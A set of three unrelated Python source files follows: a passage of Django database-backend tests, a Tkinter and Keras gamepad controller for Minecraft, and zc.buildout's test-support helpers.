# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertTrue(isinstance(cursor, CursorWrapper))
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("select 1")
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertTrue(isinstance(cursor, CursorWrapper))
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retreive the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TransactionTestCase):
available_apps = ['backends']
def test_can_reference_existant(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existant(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field_by_name("related_objects")[0].rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
class DBTestSettingsRenamedTests(IgnoreAllDeprecationWarningsMixin, TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
@classmethod
def setUpClass(cls):
# Silence "UserWarning: Overriding setting DATABASES can lead to
# unexpected behavior."
cls.warning_classes.append(UserWarning)
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
|
MCHandle.py
|
from tkinter import *
from tkinter import messagebox
from host.BaseComm import BaseComm
import threading
from keras.models import load_model
import time
from host.BaseCtrl import BaseCtrl as ctrl
from host.codemap import VirtualKeyCode
from host.ui_logger import UiLogger
import numpy as np
from PIL import ImageTk, Image, ImageDraw
import multiprocessing
class MCHandle:
ACTION_NONE = '无动作'
ACTION_FORWARD = '前进'
ACTION_JUMP = '起跳'
ACTION_DOWN = '下降'
ACTION_HIT = '打击'
ACTION_PUT = '放置'
ACTIONS = [ACTION_NONE, ACTION_FORWARD, ACTION_JUMP, ACTION_DOWN, ACTION_HIT, ACTION_PUT]
def __init__(self, root=None):
self.init_top = Tk()
self.port_left = 'COM4'
self.port_right = 'COM5'
self.init_bps = StringVar()
self.init_bps.set('115200')
self.init_com_left = StringVar()
self.init_com_left.set(self.port_left)
self.init_com_right = StringVar()
self.init_com_right.set(self.port_right)
self.init_communication()
self.bps = 115200
self.comm = None
self.n = 512
self.select = 24
self.frames = [[0 for i in range(12)] for j in range(self.n)]
self.raw = [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] for j in range(self.n)]
# 建立网络
self.model_file = 'mc_actions.h5'
# 建立网络的过程放在线程2
# 初始化手柄连接
self.comm_left = BaseComm(self.init_com_left.get(), self.bps)
self.comm_right = BaseComm(self.init_com_right.get(), self.bps)
# 灵敏度
self.sensitivity = 0.3
# 先读取几次,读取Init标志
print('预读取:')
for i in range(10):
r1 = self.comm_left.read1epoch()
r2 = self.comm_right.read1epoch()
print(r1, r2)
# 初始化某些变化的值
# 加上Uilogger
print('请保持手柄水平放置不动')
# 初始化遥感的中点值(取平均) X Y X Y
self.ave_left, self.ave_right = [0, 0], [0, 0]
pick = 10
for i in range(pick):
data = self.comm_left.read1epoch()
data_ctrl = data[-4:]
data_ctrl = list(map(int, data_ctrl))
self.ave_left[0] += data_ctrl[2] / pick
self.ave_left[1] += data_ctrl[1] / pick
data = self.comm_right.read1epoch()
data_ctrl = data[-4:]
data_ctrl = list(map(int, data_ctrl))
self.ave_right[0] += data_ctrl[2] / pick
self.ave_right[1] += data_ctrl[1] / pick
print('初始化遥感中点:', self.ave_left, self.ave_right)
self.root = root
if self.root is None:
self.root = Tk()
self.root.title("MC手柄")
self.logger = UiLogger(self.root, height=10, width=32)
self.logger.logger().grid(row=2, column=1, sticky=W+E)
self.panel = Label(self.root)
self.panel.grid(row=1, column=1, sticky=W+E)
self.lock = threading.Lock()
t = threading.Thread(target=self.read_thread)
t.setDaemon(True)
t.start()
t = threading.Thread(target=self.parse_thread)
t.setDaemon(True)
t.start()
def init_communication(self):
top = self.init_top
frame = LabelFrame(top, text="连接设置")
Label(frame, text="左手柄").grid(row=1, column=1)
Entry(frame, textvariable=self.init_com_left).grid(row=1, column=2)
Label(frame, text="右手柄").grid(row=2, column=1)
Entry(frame, textvariable=self.init_com_right).grid(row=2, column=2)
Label(frame, text="波特率").grid(row=3, column=1)
Entry(frame, textvariable=self.init_bps).grid(row=3, column=2)
frame.grid(row=1, columnspan=3, column=1)
Button(top, text="测试", command=self.init_communication_test).grid(row=2, column=1, sticky=W + E)
Button(top, text="刷新", command=self.init_communication_refresh).grid(row=2, column=2, sticky=W + E)
Button(top, text="确定", command=self.init_communication_ok).grid(row=2, column=3, sticky=W + E)
top.mainloop()
def init_communication_ok(self):
try:
bps = int(self.init_bps.get())
except ValueError:
messagebox.showerror("错误", '数值错误!')
return
self.bps = bps
self.port_left = self.init_com_left.get()
self.port_right = self.init_com_right.get()
if self.init_communication_test(show=False) is False:
messagebox.showerror("错误", '手柄测试不通过!')
return
self.init_top.destroy()
def mainloop(self):
self.root.mainloop()
def init_communication_test(self, show=True):
try:
bps = int(self.init_bps.get())
except ValueError:
messagebox.showerror("错误", '数值错误!')
return
res = True
print('测试左手柄')
comm = BaseComm(self.init_com_left.get(), bps)
if not comm.test():
if show is True:
messagebox.showerror("错误", '测试左手柄失败')
res = False
comm.close()
print('测试右手柄')
comm = BaseComm(self.init_com_right.get(), bps)
if not comm.test():
if show is True:
messagebox.showerror("错误", '测试右手柄失败')
res = False
comm.close()
return res
def init_communication_refresh(self):
pass
def draw(self):
width = 1
height = 32
colors = [
'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple',
'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple',
]
size = (width * self.n, height * 6)
im = Image.new("RGB", size, color='white')
draw = ImageDraw.Draw(im)
for i in range(self.n - 2):
for j in range(12):
draw.line((width * i, self.frames[i][j] + size[1] / 2,
width * (i + 1), self.frames[i + 1][j] + size[1] / 2), fill=colors[j])
sx = size[0] - width * self.select
draw.line((sx, 0, sx, size[1]), fill='red')
return im
# 第二个线程,负责读取
def read_thread(self):
while True:
time.sleep(0.01)
data_left = self.comm_left.read1epoch()
data_right = self.comm_right.read1epoch()
self.lock.acquire()
self.raw.append([data_left, data_right])
if len(self.raw) > self.n:
self.raw = self.raw[1:-1]
self.lock.release()
# frames添加数据
ann = data_left[0:6]
ann.extend(data_right[0:6])
self.lock.acquire()
self.frames.append(ann)
if len(self.frames) > self.n:
self.frames = self.frames[1:-1]
self.lock.release()
# print('ANN DATA:', ann)
# 第三个线程,负责解析数据
def parse_thread(self):
# 读取神经网络模型
model = load_model(self.model_file)
t1, t2 = 0, 0
click = False
key1 = ctrl.ACTION_NONE
key2 = ctrl.ACTION_NONE
jump = ctrl.ACTION_NONE
start = time.time()
while True:
if t1 == 5:
im = self.draw()
imp = ImageTk.PhotoImage(image=im)
self.panel.configure(image=imp)
self.panel.image = imp
t1 = 0
t1 += 1
time.sleep(0.01)
# data_left = self.comm_left.read1epoch()
# data_right = self.comm_right.read1epoch()
self.lock.acquire()
data_left = self.raw[-1][0]
data_right = self.raw[-1][1]
self.lock.release()
# 右手处理
right_ctrl = data_right[-4:]
right_ctrl = list(map(int, right_ctrl))
ctrl.move((right_ctrl[2] - self.ave_left[0]) * self.sensitivity,
(right_ctrl[1] - self.ave_left[1]) * self.sensitivity)
if right_ctrl[0] == 0 and click is False:
ctrl.left_down()
click = True
if right_ctrl[0] == 1 and click is True:
ctrl.left_up()
click = False
# Jump
if data_left[6] == 0 and jump == ctrl.ACTION_NONE:
jump = ctrl.ACTION_UP
ctrl.kbd_down(VirtualKeyCode.SPACEBAR)
# ctrl.kbd_click(VirtualKeyCode.SPACEBAR)
if data_left[6] == 1 and jump == ctrl.ACTION_UP:
jump = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.SPACEBAR)
# ctrl.kbd_click(VirtualKeyCode.SPACEBAR)
# 左手处理
pos = data_left[-4:][1:3]
# Right
if pos[1] > 800 and key1 == ctrl.ACTION_NONE:
key1 = ctrl.ACTION_D
ctrl.kbd_down(VirtualKeyCode.D_key)
if pos[1] <= 800 and key1 == ctrl.ACTION_D:
key1 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.D_key)
# Left
if pos[1] < 200 and key1 == ctrl.ACTION_NONE:
key1 = ctrl.ACTION_A
ctrl.kbd_down(VirtualKeyCode.A_key)
if pos[1] >= 200 and key1 == ctrl.ACTION_A:
key1 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.A_key)
# Backward
if pos[0] < 200 and key2 == ctrl.ACTION_NONE:
key2 = ctrl.ACTION_W
ctrl.kbd_down(VirtualKeyCode.W_key)
if pos[0] >= 200 and key2 == ctrl.ACTION_W:
key2 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.W_key)
# Forward
if pos[0] > 800 and key2 == ctrl.ACTION_NONE:
key2 = ctrl.ACTION_S
ctrl.kbd_down(VirtualKeyCode.S_key)
if pos[0] <= 800 and key2 == ctrl.ACTION_S:
key2 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.S_key)
# 处理神经网络判断
t2 += 1
# 隔一段时间再判断
if t2 == 15:
t2 = 0
self.lock.acquire()
x = np.array(self.frames[len(self.frames) - self.select:])
self.lock.release()
x = x.reshape((1, x.size))
# print('X shape:', x.shape)
# res = model.train_on_batch(x=x, y=y)
predict = model.predict(x=x)[0]
predict = predict.tolist()
res = predict.index(max(predict))
res = self.ACTIONS[res]
# print('predict:', res)
self.logger.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'predict %.2f' % (time.time() - start), '%s' % res))
if __name__ == '__main__':
multiprocessing.freeze_support()
_handle = MCHandle()
_handle.mainloop()
|
testing.py
|
#############################################################################
#
# Copyright (c) 2004-2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Various test-support utility functions
"""
try:
# Python 3
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import urlopen
except ImportError:
# Python 2
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urllib2 import urlopen
import errno
import logging
from multiprocessing import Process
import os
import pkg_resources
import random
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import zc.buildout.buildout
import zc.buildout.easy_install
from zc.buildout.rmtree import rmtree
print_ = zc.buildout.buildout.print_
fsync = getattr(os, 'fsync', lambda fileno: None)
is_win32 = sys.platform == 'win32'
def read(path='out', *rest):
with open(os.path.join(path, *rest)) as f:
return f.read()
def cat(dir, *names):
path = os.path.join(dir, *names)
if (not os.path.exists(path)
and is_win32
and os.path.exists(path+'-script.py')
):
path = path+'-script.py'
with open(path) as f:
print_(f.read(), end='')
def eqs(a, *b):
a = set(a); b = set(b)
return None if a == b else (a - b, b - a)
def clear_here():
for name in os.listdir('.'):
if os.path.isfile(name) or os.path.islink(name):
os.remove(name)
else:
shutil.rmtree(name)
def ls(dir, *subs):
if subs:
dir = os.path.join(dir, *subs)
names = sorted(os.listdir(dir))
for name in names:
# If we're running under coverage, elide coverage files
if os.getenv("COVERAGE_PROCESS_START") and name.startswith('.coverage.'):
continue
if os.path.isdir(os.path.join(dir, name)):
print_('d ', end=' ')
elif os.path.islink(os.path.join(dir, name)):
print_('l ', end=' ')
else:
print_('- ', end=' ')
print_(name)
def mkdir(*path):
os.mkdir(os.path.join(*path))
def remove(*path):
path = os.path.join(*path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def rmdir(*path):
shutil.rmtree(os.path.join(*path))
def write(dir, *args):
path = os.path.join(dir, *(args[:-1]))
f = open(path, 'w')
f.write(args[-1])
f.flush()
fsync(f.fileno())
f.close()
def clean_up_pyc(*path):
base, filename = os.path.join(*path[:-1]), path[-1]
if filename.endswith('.py'):
filename += 'c' # .py -> .pyc
for path in (
os.path.join(base, filename),
os.path.join(base, '__pycache__'),
):
if os.path.isdir(path):
rmdir(path)
elif os.path.exists(path):
remove(path)
## FIXME - check for other platforms
MUST_CLOSE_FDS = not sys.platform.startswith('win')
def system(command, input='', with_exit_code=False):
# Some TERMinals, expecially xterm and its variants, add invisible control
# characters, which we do not want as they mess up doctests. See:
# https://github.com/buildout/buildout/pull/311
# http://bugs.python.org/issue19884
env = dict(os.environ, TERM='dumb')
# Beginning in Python 3.4, 'U' mode to open() is deprecated.
# Python 3.7 changes the way deprecations are shown for main
# modules, and introduces $PYTHONDEVMODE which turns on warnigs in
# more places. If that's done, this leads many of our doctests to
# break; some code path through executing setup.py does this, but
# it's not in our code. Unfortunately, normalizing this printed
# line away doesn't work, it just produces a blank line. We resort
# to turning that warning off.
warnings = env.get('PYTHONWARNINGS', '')
env['PYTHONWARNINGS'] = "ignore:'U' mode is deprecated:DeprecationWarning::," + warnings
p = subprocess.Popen(command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=MUST_CLOSE_FDS,
env=env)
i, o, e = (p.stdin, p.stdout, p.stderr)
if input:
i.write(input.encode())
i.close()
result = o.read() + e.read()
o.close()
e.close()
output = result.decode()
if with_exit_code:
# Use the with_exit_code=True parameter when you want to test the exit
# code of the command you're running.
output += 'EXIT CODE: %s' % p.wait()
p.wait()
return output
def get(url):
return str(urlopen(url).read().decode())
def _runsetup(setup, *args):
if os.path.isdir(setup):
setup = os.path.join(setup, 'setup.py')
args = list(args)
args.insert(0, '-q')
here = os.getcwd()
try:
os.chdir(os.path.dirname(setup))
zc.buildout.easy_install.call_subprocess(
[sys.executable, setup] + args,
env=dict(os.environ,
PYTHONPATH=zc.buildout.easy_install.setuptools_pythonpath,
),
)
if os.path.exists('build'):
rmtree('build')
finally:
os.chdir(here)
def sdist(setup, dest):
_runsetup(setup, 'sdist', '-d', dest, '--formats=zip')
def bdist_egg(setup, executable, dest=None):
# Backward compat:
if dest is None:
dest = executable
else:
assert executable == sys.executable, (executable, sys.executable)
_runsetup(setup, 'bdist_egg', '-d', dest)
def wait_until(label, func, *args, **kw):
if 'timeout' in kw:
kw = dict(kw)
timeout = kw.pop('timeout')
else:
timeout = 30
deadline = time.time()+timeout
while time.time() < deadline:
if func(*args, **kw):
return
time.sleep(0.01)
raise ValueError('Timed out waiting for: '+label)
class TestOptions(zc.buildout.buildout.Options):
def __init__(self, *args):
zc.buildout.buildout.Options.__init__(self, *args)
self._created = []
def initialize(self):
pass
class Buildout(zc.buildout.buildout.Buildout):
def __init__(self):
for name in 'eggs', 'parts':
if not os.path.exists(name):
os.mkdir(name)
zc.buildout.buildout.Buildout.__init__(
self, '', [('buildout', 'directory', os.getcwd())], False)
Options = TestOptions
def buildoutSetUp(test):
test.globs['__tear_downs'] = __tear_downs = []
test.globs['register_teardown'] = register_teardown = __tear_downs.append
prefer_final = zc.buildout.easy_install.prefer_final()
register_teardown(
lambda: zc.buildout.easy_install.prefer_final(prefer_final)
)
here = os.getcwd()
register_teardown(lambda: os.chdir(here))
handlers_before_set_up = logging.getLogger().handlers[:]
def restore_root_logger_handlers():
root_logger = logging.getLogger()
for handler in root_logger.handlers[:]:
root_logger.removeHandler(handler)
for handler in handlers_before_set_up:
root_logger.addHandler(handler)
bo_logger = logging.getLogger('zc.buildout')
for handler in bo_logger.handlers[:]:
bo_logger.removeHandler(handler)
register_teardown(restore_root_logger_handlers)
base = tempfile.mkdtemp('buildoutSetUp')
base = os.path.realpath(base)
register_teardown(lambda base=base: rmtree(base))
old_home = os.environ.get('HOME')
os.environ['HOME'] = os.path.join(base, 'bbbBadHome')
def restore_home():
if old_home is None:
del os.environ['HOME']
else:
os.environ['HOME'] = old_home
register_teardown(restore_home)
base = os.path.join(base, '_TEST_')
os.mkdir(base)
tmp = tempfile.mkdtemp('buildouttests')
register_teardown(lambda: rmtree(tmp))
zc.buildout.easy_install.default_index_url = 'file://'+tmp
os.environ['buildout-testing-index-url'] = (
zc.buildout.easy_install.default_index_url)
def tmpdir(name):
path = os.path.join(base, name)
mkdir(path)
return path
sample = tmpdir('sample-buildout')
os.chdir(sample)
# Create a basic buildout.cfg to avoid a warning from buildout:
with open('buildout.cfg', 'w') as f:
f.write("[buildout]\nparts =\n")
# Use the buildout bootstrap command to create a buildout
zc.buildout.buildout.Buildout(
'buildout.cfg',
[('buildout', 'log-level', 'WARNING'),
# trick bootstrap into putting the buildout develop egg
# in the eggs dir.
('buildout', 'develop-eggs-directory', 'eggs'),
]
).bootstrap([])
# Create the develop-eggs dir, which didn't get created the usual
# way due to the trick above:
os.mkdir('develop-eggs')
if os.getenv("COVERAGE_PROCESS_START"):
# The user has requested subprocess code coverage. Since we will be changing
# directories, we need to make sure this path is absolute, which means
# we need to temporarily return to our starting directory.
os.chdir(here)
path_to_coveragerc = os.path.abspath(os.environ['COVERAGE_PROCESS_START'])
os.chdir(sample)
assert os.path.isfile(path_to_coveragerc), path_to_coveragerc
os.environ['COVERAGE_PROCESS_START'] = path_to_coveragerc
# Before we return to the current directory and destroy the
# temporary working directory, we need to copy all the coverage files
# back so that they can be `coverage combine`d.
